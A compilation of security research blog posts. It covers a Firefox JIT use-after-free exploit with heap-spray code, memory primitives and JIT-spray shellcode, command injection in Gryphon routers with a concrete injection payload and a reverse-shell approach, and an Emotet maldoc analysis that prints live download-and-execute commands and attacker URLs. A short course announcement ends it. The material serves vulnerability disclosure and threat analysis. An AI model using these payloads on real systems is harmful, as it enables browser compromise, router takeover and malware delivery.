       (this.getName() = "Store" or this.getName() = "Load" or this.getName() = "None" or this.getName() = "All") and this.getType().getName() = "AliasSet"
   }
}
 
from VMFunction f, FunctionCall fc, Function basef, Class c, Function aliassetf, AliasSetFunc asf, string path
where fc.getTarget().getName().matches("%allVM%") and f = fc.getATemplateArgument().(FunctionAccess).getTarget() // Find calls to the VM from JIT
and path = tracePropDef(0, f) // Where the VM function has a path to resolveConstructor (Getting the path as a string)
and basef = traceVisit(0, fc.getEnclosingFunction()) // Find what LIR node this VM function was created from
and c.getName().charAt(0) = "M" // A quick hack to check if the function is a MIR node class
and aliassetf = alias(c) // Get the getAliasSet function for this class
and asf.getACallToThisFunction().getEnclosingFunction() = aliassetf // Get the AliasSet returned in this function.
and basef.getName().substring(5, c.getName().suffix(1).length() + 5) = c.getName().suffix(1) // Get the actual node name (without the L or M prefix) to match against the visit* function
and (asf.toString() = "Load" or asf.toString() = "None") // We're only interested in Load and None alias sets.
select c, f, asf, basef, path

This produced a number of results, most of which were for properties defined for new objects such as errors. It did, however, reveal something interesting in the MCreateThis node. It appears that the node has AliasSet::Load(AliasSet::Any), despite the fact that when a constructor is called, it may generate a prototype with lazy evaluation, as described above.

However, this bug is actually unexploitable since this node is followed by either an MCall node, an MConstructArray node, or an MApplyArgs node. All three of these nodes have AliasSet::Store(AliasSet::Any), so any MSlots nodes that follow the constructor call will not be eliminated, meaning that there is no way to trigger a use-after-free.

Triggering the Vulnerability

The proof-of-concept reported to Mozilla was reduced by Jan de Mooij to a basic form. In order to make it readable, I’ve added comments to explain what each important line is doing:

function init() {
 
   // Create an object to be read for the UAF
   var target = {};
   for (var i = 0; i < ...) {
       ...
   }
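Conceptually, the trigger has the following shape (a hypothetical outline with illustrative property names, not the reduced PoC itself):

function trigger(cons) {
    // First access: GuardShape + Slots + LoadDynamicSlot for 'x0'
    let a = cons.x0;

    // JSOp::New -> IonBuilder::createThisScripted -> MCallGetProperty.
    // fun_resolve defines 'prototype', reallocating cons's slots array.
    new cons();

    // Redundancy elimination reuses the stale Slots pointer here,
    // resulting in the use-after-free.
    let b = cons.x1;
    return a + b;
}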

Exploiting CVE-2020-26950

Use-after-frees in Spidermonkey don’t get written about a lot, especially when it comes to those caused by JIT.

As with any heap-related exploit, the heap allocator needs to be understood. In Firefox, you’ll encounter two heap types:

  • Nursery - Where most objects are initially allocated.
  • Tenured - Objects that are alive when garbage collection occurs are moved from the nursery to here.

The nursery heap is relatively straightforward. The allocator has a chunk of contiguous memory that it uses for user allocation requests, an offset pointing to the next free spot in this region, and a capacity value, among other things.
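In outline, the nursery behaves like a simple bump allocator; a minimal sketch (class and field names are hypothetical, not SpiderMonkey's actual implementation):

// A minimal sketch of the nursery's bump-allocation behaviour
class Nursery {
    constructor(capacity) {
        this.position = 0;        // offset of the next free byte
        this.capacity = capacity; // size of the contiguous chunk
    }
    allocate(size) {
        if (this.position + size > this.capacity) {
            return null; // chunk exhausted - a minor GC would run here
        }
        const offset = this.position;
        this.position += size; // no free(): memory is only reclaimed by GC
        return offset;
    }
}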

Exploiting a use-after-free in the nursery would require the garbage collector to be triggered in order to reallocate objects over this location as there is no reallocation capability when an object is moved.

Due to the simplicity of the nursery, a use-after-free in this heap type is trickier to exploit from JIT code. Because JIT-related bugs often have a whole number of assumptions you need to maintain while exploiting them, you’re limited in what you can do without breaking them. For example, with this bug you need to ensure that any instructions you use between the Slots pointer getting saved and it being used when freed are not aliasing with the use. If they were, then that would mean that a second MSlots node would be required, preventing the use-after-free from occurring. Triggering the garbage collector puts us at risk of triggering a bailout, destroying our heap layout, and thus ruining the stability of the exploit.

The tenured heap plays by different rules to the nursery heap. It uses mozjemalloc (a fork of jemalloc) as a backend, which gives us opportunities for exploitation without touching the GC.

As previously mentioned, the tenured heap is used for long-living objects; however, there are several other conditions that can cause allocation here instead of the nursery, such as:

  • Global objects - Their elements and slots will be allocated in the tenured heap because global objects are often long-living.
  • Large objects - The nursery has a maximum size for objects, defined by the constant MaxNurseryBufferSize, which is 1024.

By creating an object with enough properties, the slots array will instead be allocated in the tenured heap. If the slots array has fewer than 256 properties in it, then jemalloc backs it with a "Small" allocation. If it has 256 or more properties in it, then jemalloc backs it with a "Large" allocation. To understand these two classes and their differences in depth, it's best to refer to sources that extensively cover the jemalloc allocator. For this exploit, we will be using Large allocations to perform our use-after-free.
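A sketch of what such an object looks like in script (the property count mirrors the sprays used later in the exploit; the exact number is not critical as long as it clears the thresholds above):

// Hypothetical sketch: a constructor with enough properties that its slots
// backing store lands in the tenured heap as a jemalloc "Large" allocation.
var cons = function() {};
for (var i = 0; i < 481; i++) {
    cons["p" + i] = i; // each named property occupies one slot
}
// 481 slots is well past both the nursery object size limit and the
// 256-slot Small/Large boundary described above.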

Reallocating

In order to write a use-after-free exploit, you need to allocate something useful in the place of the previously freed location. For JIT code this can be difficult because many instructions would stop the second MSlots node from being removed. However, it’s possible to create arrays between these MSlots nodes and the property access.

Array element backing stores are a great candidate for reallocation because of their header. While properties start at offset 0 in their allocated Slots array, elements start at offset 0x10:

A comparison between the elements backing store and the slots backing store

If a use-after-free were to occur, and an elements backing store was reallocated on top, the length values could be updated using the first and second properties of the Slots backing store.

To get to this point requires a heap spray similar to the one used in the trigger example above:

/*
   jitme - Triggers the vulnerability
*/
function jitme(cons, interesting, i) {
   interesting.x1 = 10; // Make sure the MSlots is saved
 
   new cons(); // Trigger the vulnerability - Reallocates the object slots
 
   // Allocate a large array on top of this previous slots location.
   let target = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 489 to be close to the number of properties ‘cons’ has
  
   // Avoid Elements Copy-On-Write by pushing a value
   target.push(i);
  
   // Write the Initialized Length, Capacity, and Length to be larger than it is
   // This will work when interesting == cons
   interesting.x1 = 3.476677904727e-310;
   interesting.x0 = 3.4766779039175e-310;
 
   // Return the corrupted array
   return target;
}
 
/*
   init - Initialises vulnerable objects
*/
function init() {
   // arr will contain our sprayed objects
   var arr = [];
 
   // We'll create one object...
   var cons = function() {};
   for(i=0; i < ...) {
       ...
   }

Which gets us to this layout:

Before and after the use-after-free is exploited

At this point, we have an Array object with a corrupted elements backing store. It can only read/write Nan-Boxed values to out of bounds locations (in this case, the next Slots store).
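In the snippets that follow, evil refers to this corrupted array (the binding to jitme()'s return value is assumed from the full exploit); a sketch of its use:

// Hypothetical sketch of how the corrupted array is used from here on
evil = jitme(cons, interesting, i); // the corrupted array from above

// Index 511 is past the array's real elements and lands in the adjacent
// slots store, readable and writable as NaN-boxed doubles:
let leak = evil[511];  // out-of-bounds read
evil[511] = 1.1;       // out-of-bounds write (later: the RareArgumentsData pointer)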

Going from this layout to some useful primitives such as ‘arbitrary read’, ‘arbitrary write’, and ‘address of’ requires some forethought.

Primitive Design

Typically, the route exploit developers go when creating primitives in browser exploitation is to use ArrayBuffers. This is because the values in their backing stores aren’t NaN-boxed like property and element values are, meaning that if an ArrayBuffer and an Array both had the same backing store location, the ArrayBuffer could make fake Nan-Boxed pointers, and the Array could use them as real pointers using its own elements. Likewise, the Array could store an object as its first element, and the ArrayBuffer could read it directly as a Float64 value.

This works well with out-of-bounds writes in the nursery because the ArrayBuffer object will be allocated next to other objects. In our case, however, the out-of-bounds access happens in the tenured heap, so the ArrayBuffer object itself is out of reach, since it is allocated in the nursery. While the ArrayBuffer backing store can be stored in the tenured heap, Mozilla is already very aware of how it is used in exploits and has thus created a separate arena for them:

Instead of thinking of how I could get around this, I opted to read through the Spidermonkey code to see if I could come up with a new primitive that would work for the tenured heap. While there were a number of options related to WASM, function arguments ended up being the nicest way to implement it.

Function Arguments

When you call a function, a new object gets created called arguments. This allows you to access not just the arguments defined by the function parameters, but also those that aren’t:

function arg() {
   return arguments[0] + arguments[1];
}

arg(1,2);

Spidermonkey represents this object in memory as an ArgumentsObject. This object has a reserved property that points to an ArgumentsData backing store (of course, stored in the tenured heap when large enough), where it holds an array of values supplied as arguments.

One of the interesting properties of the arguments object is that you can delete individual arguments. The caveat to this is that you can only delete it from the arguments object, but an actual named parameter will still be accessible:

function arg(x) {
   console.log(x); // 1
   console.log(arguments[0]); // 1

   delete arguments[0]; // Delete the first argument (x)

   console.log(x); // 1
   console.log(arguments[0]); // undefined
}

arg(1);

To avoid needing separate storage for the arguments object and the named arguments, Spidermonkey implements a RareArgumentsData structure (named as such because it's rare that anybody would even delete anything from the arguments object). This is a plain (non-NaN-boxed) pointer to a memory location that contains a bitmap. Each bit represents an index in the arguments object. If the bit is set, then the element is considered "deleted" from the arguments object. This means that the actual value doesn't need to be removed, and arguments and parameters can share the same space without problems.

The benefit of this is threefold:

  • The RareArgumentsData pointer can be moved anywhere and used to read the value of an address bit-by-bit.
  • The current RareArgumentsData pointer has no NaN-Boxing so can be read with the out-of-bounds array, giving a leaked pointer.
  • The RareArgumentsData pointer is allocated in the nursery due to its size.

To summarise this, the layout of the arguments object is as so:

The layout of the three Arguments object types in memory

By freeing up the remaining vulnerable objects in our original spray array, we can then spray ArgumentsData structures using recursion (similar to this old bug) and reallocate on top of these locations. In JavaScript this looks like:

// Global that holds the total number of objects in our original spray array
TOTAL = 0;
 
// Global that holds the target argument so it can be used later
arg = 0;
 
/*
   setup_prim - Performs recursion to get the vulnerable arguments object
       arguments[0] - Original spray array
       arguments[1] - Recursive depth counter
       arguments[2]+ - Numbers to pad to the right reallocation size
*/
function setup_prim() {
   // Base case of our recursion
   // If we have reached the end of the original spray array...
   if(arguments[1] == TOTAL) {
 
       // Delete an argument to generate the RareArgumentsData pointer
       delete arguments[3];
 
       // Read out of bounds to the next object (sprayed objects)
       // Check whether the RareArgumentsData pointer is null
       if(evil[511] != 0) return arguments;
 
       // If it was null, then we return and try the next one
       return 0;
   }
 
   // Get the cons value
   let cons = arguments[0][arguments[1]];
 
   // Move the pointer (could just do cons.p481 = 481, but this is more fun)
   new cons();
 
   // Recursive call
   res = setup_prim(arguments[0], arguments[1]+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ); // Goes on to 480
 
   // If the returned value is non-zero, then we found our target ArgumentsData object, so keep returning it
   if(res != 0) return res;
 
   // Otherwise, repeat the base case (delete an argument)
   delete arguments[3];
 
   // Check if the next object has a null RareArgumentsData pointer
   if(evil[511] != 0) return arguments; // Return arguments if not
 
   // Otherwise just return 0 and try the next one
   return 0;
}
 
/*
   main - Performs the exploit
*/
function main() {
   ...
 
   // Start the recursive spray across the original array
   TOTAL=arr.length;
   arg = setup_prim(arr, i+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ); // Goes on to 480
}

Once the base case is reached, the memory layout is as so:

The tenured heap layout after the remaining slots arrays were freed and reallocated

Read Primitive

A read primitive is relatively trivial to set up from here. A double value representing the address needs to be written to the RareArgumentsData pointer. The arguments object can then be read from to check for undefined values, representing set bits:

/*
   weak_read32 - Bit-by-bit read
*/
function weak_read32(arg, addr) {
   // Set the RareArgumentsData pointer to the address
   evil[511] = addr;
 
   // Used to hold the leaked data
   let val = 0;
  
   // Read it bit-by-bit for 32 bits
   // Endianness is taken into account
    for(let i = 32; i >= 0; i--) {
        val = val << 1;
        if(arg[i] == undefined) val = val | 1; // a deleted (bit-set) index reads as undefined
    }

    return val;
}
       val[0] = val[0] 

Write Primitive

Constructing a write primitive is a little more difficult. You may think we can just delete an argument to set the bit to 1, and then overwrite the argument to unset it. Unfortunately, that doesn’t work. You can delete the object and set its appropriate bit to 1, but if you set the argument again it will just allocate a new slots backing store for the arguments object and create a new property called ‘0’. This means we can only set bits, not unset them.
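A small sketch of this one-way behaviour (illustrative only):

function demo(x) {
    delete arguments[0]; // sets bit 0 in the RareArgumentsData bitmap
    arguments[0] = 5;    // does NOT clear the bit - it defines a new own
                         // property '0' in a fresh slots backing store
    // From the engine's point of view, the bitmap bit for index 0 stays set.
}
demo(1);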

While this means we can’t change a memory address from one location to another, we can do something much more interesting. The aim is to create a fake object primitive using an ArrayBuffer’s backing store and an element in the ArgumentsData structure. The NaN-Boxing required for a pointer can be faked by doing the following:

  1. Write the double equivalent of the unboxed pointer to the property location.
  2. Use the bit-set capability of the arguments object to fake the pointer NaN-Box.

From here we can create a fake ArrayBuffer (A fake ArrayBuffer object within another ArrayBuffer backing store) and constantly update its backing store pointer to arbitrary memory locations to be read as Float64 values.

In order to do this, we need several bits of information:

  1. The address of the ArgumentsData structure (A tenured heap address is required).
  2. All the information from an ArrayBuffer (Group, Shape, Elements, Slots, Size, Backing Store).
  3. The address of this ArrayBuffer (A nursery heap address is required).

Getting the address of the ArgumentsData structure turns out to be pretty straightforward: we iterate backwards from the RareArgumentsData pointer that was leaked using the corrupted array (since the ArgumentsObject was allocated before the RareArgumentsData pointer, we work backwards):

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   old_rareargdat_ptr = evil[511];
   console.log("[+] Leaked nursery location: " + dbl_to_bigint(old_rareargdat_ptr).toString(16));
 
   iterator = dbl_to_bigint(old_rareargdat_ptr); // Start from this value
   counter = 0; // Used to prevent a while(true) situation
   while(counter < ...) {
       ...
   }

The next step is to allocate an ArrayBuffer and find its location:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   // The target Uint32Array - A large size value to:
   //   - Help find the object (Not many 0x00101337 values nearby!)
   //   - Give enough space for 0xfffff so we can fake a Nursery Cell ((ptr & 0xfffffffffff00000) | 0xfffe8 must be set to 1 to avoid crashes)
   target_uint32arr = new Uint32Array(0x101337);
 
   // Find the Uint32Array starting from the original leaked Nursery pointer
   iterator = dbl_to_bigint(old_rareargdat_ptr);
   counter = 0; // Use a counter
   while(counter < ...) {
       ...
   }

Now that the address of the ArrayBuffer has been found, a fake/clone of it can be constructed within its own backing store:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
  
   // Create a fake ArrayBuffer through cloning
   iterator = arr_buf_addr;
   for(i=0;i < ...) {
       ...
   }

There is now a valid fake ArrayBuffer object in an area of memory. In order to turn this block of data into a fake object, an object property or an object element needs to point to the location, which gives rise to the problem: We need to create a NaN-Boxed pointer. This can be achieved using our trusty “deleted property” bitmap. Earlier I mentioned the fact that we can’t change a pointer because bits can only be set, and that’s true.

The trick here is to use the corrupted array to write the address as a float, and then use the deleted property bitmap to create the NaN-Box, in essence faking the NaN-Boxed part of the pointer:

A breakdown of how the NaN-Boxed value is put together

Using JavaScript, this can be done as so:

/*
   write_nan - Uses the bit-setting capability of the bitmap to create the NaN-Box
*/
function write_nan(arg, addr) {
   evil[511] = addr;
   for(let i = 64 - 15; i < 64; i++) delete arg[i]; // Set the top 15 bits to fake the NaN-Box
}

Finally, the write primitive can then be used by changing the fake_arrbuf backing store using target_uint32arr[14] and target_uint32arr[15]:

/*
   write - Write a value to an address
*/
function write(address, value) {
   // Set the fake ArrayBuffer backing store address
   address = dbl_to_bigint(address)
   target_uint32arr[14] = parseInt(address) & 0xffffffff
   target_uint32arr[15] = parseInt(address >> 32n);

   // Use the fake ArrayBuffer backing store to write a value to a location
   value = dbl_to_bigint(value);
   fake_arrbuf[1] = parseInt(value >> 32n);
   fake_arrbuf[0] = parseInt(value & 0xffffffffn);
}

The following diagram shows how this all connects together:

Address-Of Primitive

The last primitive is the address-of (addrof) primitive. It takes an object and returns the address that it is located in. We can use our fake ArrayBuffer for this by setting a property in our arguments object to the target object, setting the backing store of our fake ArrayBuffer to this location, and reading the address. Note that in this function we’re using our fake object to read the value instead of the bitmap. This is just another way of doing the same thing.

/*
   addrof - Gets the address of a given object
*/
function addrof(arg, o) {
   // Set the 5th property of the arguments object
   arg[5] = o;

   // Get the address of the 5th property
   target = ad_location + (7n * 8n) // [len][deleted][0][1][2][3][4][5] (index 7)

   // Set the fake ArrayBuffer backing store to point to this location
   target_uint32arr[14] = parseInt(target) & 0xffffffff;
   target_uint32arr[15] = parseInt(target >> 32n);

   // Read the address of the object o
    return (BigInt(fake_arrbuf[1] & 0xffff) << 32n) + BigInt(fake_arrbuf[0]);
}

Code Execution

With the primitives completed, the only thing left is to get code execution. While there’s nothing particularly new about this method, I will go over it in the interest of completeness.

Unlike Chrome, WASM regions aren’t read-write-execute (RWX) in Firefox. The common way to go about getting code execution is by performing JIT spraying. Simply put, a function containing a number of constant values is made. By executing this function repeatedly, we can cause the browser to JIT compile it. These constants then sit beside each other in a read-execute (RX) region. By changing the function’s JIT region pointer to these constants, they can be executed as if they were instructions:

/*
   shellcode - Constant values which hold our shellcode to pop xcalc.
*/
function shellcode(){
   find_me = 5.40900888e-315; // 0x41414141 in memory
   A = -6.828527034422786e-229; // 0x9090909090909090
   B = 8.568532312320605e+170;
   C = 1.4813365150669252e+248;
   D = -6.032447120847604e-264;
   E = -6.0391189260385385e-264;
   F = 1.0842822352493598e-25;
   G = 9.241363425014362e+44;
   H = 2.2104256869204514e+40;
   I = 2.4929675059396527e+40;
   J = 3.2459699498717e-310;
   K = 1.637926e-318;
}
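As a sanity check on the encoding (not part of the exploit itself), the raw bits of such a constant can be inspected from script; for instance, the NOP-sled constant above:

// -6.828527034422786e-229 is the double whose 8 raw bytes are 0x90 (NOP)
const buf = new ArrayBuffer(8);
new Float64Array(buf)[0] = -6.828527034422786e-229;
console.log(new Uint8Array(buf)); // Uint8Array(8) [144, 144, 144, 144, 144, 144, 144, 144]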
 
/*
   main - Performs the exploit
*/
function main() {
   for(i = 0;i < ...) {
       ...
   }

A video of the exploit can be found here.

"Wrote an exploit for a very interesting Firefox bug. Gave me a chance to try some new things out! More coming soon!" pic.twitter.com/g6K9tuK4UG — maxpl0it (@maxpl0it), February 1, 2022

Conclusion

Throughout this post we have covered a wide range of topics, such as the basics of JIT compilers in JavaScript engines, vulnerabilities from their assumptions, exploit primitive construction, and even using CodeQL to find variants of vulnerabilities.

Doing so meant that a new set of exploit primitives was found, an unexploitable variant of the vulnerability itself was identified, and a vulnerability with many caveats was exploited.

This blog post highlights the kind of research SentinelLabs does in order to identify exploitation patterns.

Rooting Gryphon Routers via Shared VPN

4 February 2022 at 18:15

🎵 This LAN is your LAN, this LAN is my LAN 🎵

Intro

In August 2021, I discovered and reported a number of vulnerabilities in the Gryphon Tower router, including several command injection vulnerabilities exploitable to an attacker on the router’s LAN. Furthermore, these vulnerabilities are exploitable via the Gryphon HomeBound VPN, a network shared by all devices which have enabled the HomeBound service.

The implications of this are that an attacker can exploit and gain complete control over victim routers from anywhere on the internet if the victim is using the Gryphon HomeBound service. From there, the attacker could pivot to attacking other devices on the victim’s home network.

In the sections below, I’ll walk through how I discovered these vulnerabilities and some potential exploits.

Initial Access

When initially setting up the Gryphon router, the Gryphon mobile application is used to scan a QR code on the base of the device. In fact, all configuration of the device thereafter uses the mobile application. There is no traditional web interface to speak of. When navigating to the device’s IP in a browser, one is greeted with a simple interface that is used for the router’s Parental Control type features, running on the Lua Configuration Interface (LuCI).

The physical Gryphon device is nicely put together. Removing the case was simple, and upon removing it we can see that Gryphon has already included a handy pin header for the universal asynchronous receiver-transmitter (UART) interface.

As in previous router work I used JTAGulator and PuTTY to connect to the UART interface. The JTAGulator tool lets us identify the transmit/receive data (txd / rxd) pins as well as the appropriate baud rate (the symbol rate / communication speed) so we can communicate with the device.


Unfortunately the UART interface doesn’t drop us directly into a shell during normal device operation. However, while watching the boot process, we see the option to enter a “failsafe” mode.

Fs in the chat

Entering this failsafe mode does drop us into a root shell on the device, though the rest of the device’s normal startup does not take place, so no services are running. This is still an excellent advantage, however, as it allows us to grab any interesting files from the filesystem, including the code for the limited web interface.

Getting a shell via LuCI

Now that we have the code for the web interface (specifically the index.lua file at /usr/lib/lua/luci/controller/admin/) we can take a look at which urls and functions are available to us. Given that this is lua code, we do a quick ctrl-f (the most advanced of hacking techniques) for calls to os.execute(), and while most calls to it in the code are benign, our eyes are immediately drawn to the config_repeater() function.

function config_repeater()
  <snip> --removed variable setting for clarity
  cmd = "/sbin/configure_repeater.sh " .. "\"" .. ssid .. "\"" .. " " .. "\"" .. key .. "\"" .. " " .. "\"" .. hidden .. "\"" .. " " .. "\"" .. ssid5 .. "\"" .. " " .. "\"" .. key5 .. "\"" .. " " .. "\"" .. mssid .. "\"" .. " " .. "\"" .. mkey .. "\"" .. " " .. "\"" .. gssid .. "\"" .. " " .. "\"" .. gkey .. "\"" .. " " .. "\"" .. ghidden .. "\"" .. " " .. "\"" .. country .. "\"" .. " " .. "\"" .. bssid .. "\"" .. " " .. "\"" .. board .. "\"" .. " " .. "\"" .. wpa .. "\""
  os.execute(cmd)
  os.execute("touch /etc/rc_in_progress.txt")
  os.execute("/sbin/mark_router.sh 2 &")
  luci.http.header("Access-Control-Allow-Origin","*")
  luci.http.prepare_content("application/json")
  luci.http.write("{\"rc\": \"OK\"}")
end

The cmd variable in the snippet above is constructed using unsanitized user input in the form of POST parameters, and is passed directly to os.execute() in a way that would allow an attacker to easily inject commands.

This config_repeater() function corresponds to the URL http://192.168.1.1/cgi-bin/luci/rc.

Line 42: the answer to life, the universe, and command injections.

Since we know our input will be passed directly to os.execute(), we can build a simple payload to get a shell. In this case, we string together commands, using wget to grab a Python reverse shell and then running it.

Now that we have a shell, we can see what other services are active and listening on open ports. The most interesting of these is the controller_server service listening on port 9999.

controller_server and controller_client

controller_server is a service which listens on port 9999 of the Gryphon router. It accepts a number of commands in json format, the appropriate format for which we determined by looking at its sister binary, controller_client. The inputs expected for each controller_server operation can be seen being constructed in corresponding operations in controller_client.

Opening controller_server in Ghidra for analysis leads one fairly quickly to a large switch/case section where the potential cases correspond to numbers associated with specific operations to be run on the device.

In order to hit this switch/case statement, the input passed to the service is a json object in the format: {"<operationNumber>" : {"<op parameter 1>":"param 1 value", ...}}.

Where the operation number corresponds to the decimal version of the desired function from the switch/case statements, and the operation parameters and their values are in most cases passed as input to that function.

Out of curiosity, I applied the elite hacker technique of ctrl-f-ing for direct calls to system() to see whether they were using unsanitized user input. As luck would have it, many of the functions (labelled operation_xyz in the screenshot above) pass user controlled strings directly in calls to system(), meaning we just found multiple command injection vulnerabilities.

As an example, let’s look at the case for operation 0x29 (41 in decimal):

In the screenshot above, we can see that the function parses a json object looking for the key cmd, and concatenates the value of cmd to the string "/sbin/uci set wireless.", which is then passed directly to a call to system().

This can be trivially injected using any number of methods, the simplest being passing a string containing a semicolon. For example, a cmd value of ";id>/tmp/op41" would result in the output of the id command being written to the /tmp/op41 file.

The full payload to be sent to the controller_server service listening on 9999 to achieve this would be {"41":{"cmd":";id>/tmp/op41"}}.

Additionally, the service leverages SSL/TLS, so in order to send this command using something like ncat, we would need to run the following series of commands:

echo '{"41":{"cmd":";id>/tmp/op41"}}' | ncat --ssl <device-ip> 9999
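Equivalently, a short Node.js sketch of the same request (the router IP is an assumption, and certificate validation is disabled on the assumption that the service presents a self-signed certificate):

// Minimal sketch: send the operation-41 payload to controller_server over TLS
const tls = require("tls");

const sock = tls.connect(
    { host: "192.168.1.1", port: 9999, rejectUnauthorized: false }, // LAN IP assumed
    () => {
        sock.write(JSON.stringify({ "41": { "cmd": ";id>/tmp/op41" } }));
        sock.end();
    }
);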

We can use this same method against a number of the other operations as well, and could create a payload which allows us to gain a shell on the device running as root.

Fortunately, the Gryphon routers do not expose port 9999 or 80 on the WAN interface, meaning an attacker has to be on the device’s LAN to exploit the vulnerabilities. That is, unless the attacker connects to the Gryphon HomeBound VPN.

HomeBound : Your LAN is my LAN too

Gryphon HomeBound is a mobile application which, according to Gryphon, securely routes all traffic on your mobile device through your Gryphon router before it hits the internet.

In order to accomplish this the Gryphon router connects to a VPN network which is shared amongst all devices connected to HomeBound, and connects using a static openvpn configuration file located on the router’s filesystem. An attacker can use this same openvpn configuration file to connect themselves to the HomeBound network, a class B network using addresses in the 10.8.0.0/16 range.

Furthermore, the Gryphon router exposes its listening services on the tun0 interface connected to the HomeBound network. An attacker connected to the HomeBound network could leverage one of the previously mentioned vulnerabilities to attack other routers on the network, and could then pivot to attacking other devices on the individual customers’ LANs.

This puts any customer who has enabled the HomeBound service at risk of attack, since their router will be exposing vulnerable services to the HomeBound network.

In the clip below we can see an attacking machine, connected to the HomeBound VPN, running a proof of concept reverse shell against a test router which has enabled the HomeBound service.

While the HomeBound service is certainly an interesting idea for a feature in a consumer router, it is implemented in a way that leaves users’ devices vulnerable to attack.

Wrap Up

An attacker being able to execute code as root on home routers could allow them to pivot to attacking those victims’ home networks. At a time when a large portion of the world is still working from home, this poses an increased risk to both the individual’s home network as well as any corporate assets they may have connected.

At the time of writing, Gryphon has not released a fix for these issues. The Gryphon Tower routers are still vulnerable to several command injection vulnerabilities exploitable via LAN or via the HomeBound network. Furthermore, during our testing it appeared that once the HomeBound service has been enabled, there is no way to disable the router’s connection to the HomeBound VPN without a factory reset.

It is recommended that customers who think they may be vulnerable contact Gryphon support for further information.

Update (April 8 2022): The issues have been fixed in updated firmware versions released by Gryphon. See the Solution section of Tenable’s advisory or contact Gryphon for more information: https://www.tenable.com/security/research/tra-2021-51


Rooting Gryphon Routers via Shared VPN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Emotet’s Uncommon Approach of Masking IP Addresses

4 February 2022 at 23:00

Authored By: Kiran Raj

In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and octal formats to represent IP addresses, which are usually represented in decimal format. An example of this is shown below:

Hexadecimal format: 0xb907d607 (decimal equivalent: 185.7.214.7)

Octal format: 0056.0151.0121.0114 (decimal equivalent: 46.105.81.76)
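The conversions are easy to verify in JavaScript (run in Node, for example):

// Hexadecimal: the 32-bit value is split into four octets
const ip = 0xb907d607;
console.log([24, 16, 8, 0].map(s => (ip >>> s) & 0xff).join(".")); // 185.7.214.7

// Octal: each dotted component is itself an octal number
console.log([0o056, 0o151, 0o121, 0o114].join(".")); // 46.105.81.76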

This change in format might evade some AV products relying on command line parameters but McAfee was still able to protect our customers. This blog explains this new technique.

Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee

Threat Summary

  1. The initial attack vector is a phishing email with a Microsoft Excel attachment. 
  2. Upon opening the Excel document and enabling editing, Excel executes a malicious JavaScript from a server via mshta.exe 
  3. The malicious JavaScript further invokes PowerShell to download the Emotet payload. 
  4. The downloaded Emotet payload will be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.

Maldoc Analysis

Below is the image (Figure 2) of the initial worksheet opened in Excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.

On examining the excel spreadsheet further, we can see a few cell addresses added in the Named Manager window. Cells mentioned in the Auto_Open value will be executed automatically resulting in malicious code execution.

Figure 3- Named Manager and Auto_Open triggers

Below are the commands used in Hexadecimal and Octal variants of the Maldocs

FORMAT        OBFUSCATED CMD                                                DEOBFUSCATED CMD
Hexadecimal   cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html          http://185[.]7[.]214[.]7/fer/fer.html
Octal         cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html   http://46[.]105[.]81[.]76/c.html

Execution

On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript which is within an html file.

Figure 4: Process tree of excel execution

The downloaded file fer.html, containing the malicious JavaScript, is encoded with HTML Guardian to obfuscate the code.

Figure 5- Image of HTML page viewed in a browser

The malicious JavaScript invokes PowerShell to download the Emotet payload from "hxxp://185[.]7[.]214[.]7/fer/fer.png" to the following path: "C:\Users\Public\Documents\ssd.dll".

Command line: (New-Object Net.WebClient).DownloadString('http://185[.]7[.]214[.]7/fer/fer.png')

The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server:

Command line: cmd /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString

IOC

TYPE       VALUE                                                              SCANNER                                DETECTION NAME
XLS        06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c   McAfee LiveSafe and Total Protection   X97M/Downloader.nn
DLL        a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3   McAfee LiveSafe and Total Protection   Emotet-FSY
HTML URL   http://185[.]7[.]214[.]7/fer/fer.html                              WebAdvisor                             Blocked
           http://46[.]105[.]81[.]76/c.html
DLL URL    http://185[.]7[.]214[.]7/fer/fer.png                               WebAdvisor                             Blocked
           http://46[.]105[.]81[.]76/cc.png

MITRE ATT&CK

TECHNIQUE ID   TACTIC                TECHNIQUE DETAILS                      DESCRIPTION
T1566          Initial Access        Phishing attachment                    Initial maldoc uses phishing strings to convince users to open the maldoc
T1204          Execution             User Execution                         Manual execution by user
T1071          Command and Control   Standard Application Layer Protocol    Attempts to connect through HTTP
T1059          Execution             Command and Scripting Interpreter      Starts CMD.EXE for command execution; Excel uses cmd and PowerShell to execute commands
T1218          Defense Evasion       Signed Binary Proxy Execution          Uses RUNDLL32.EXE and MSHTA.EXE to load libraries; rundll32 runs the downloaded payload and mshta executes the malicious JavaScript

Conclusion

Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.

The post Emotet’s Uncommon Approach of Masking IP Addresses appeared first on McAfee Blog.

Next COM Programming Class

5 February 2022 at 10:42

Update: the class is cancelled. I guess there weren’t that many people interested in COM this time around.

Today I’m opening registration for the COM Programming class to be held in April. The syllabus for the 3 day class can be found here. The course will be delivered in 6 half-days (4 hours each).

Dates: April (25, 26, 27, 28), May (2, 3).
Times: 2pm to 6pm, London time
Cost: 700 USD (if paid by an individual), 1300 USD (if paid by a company).

The class will be conducted remotely using Microsoft Teams or a similar platform.

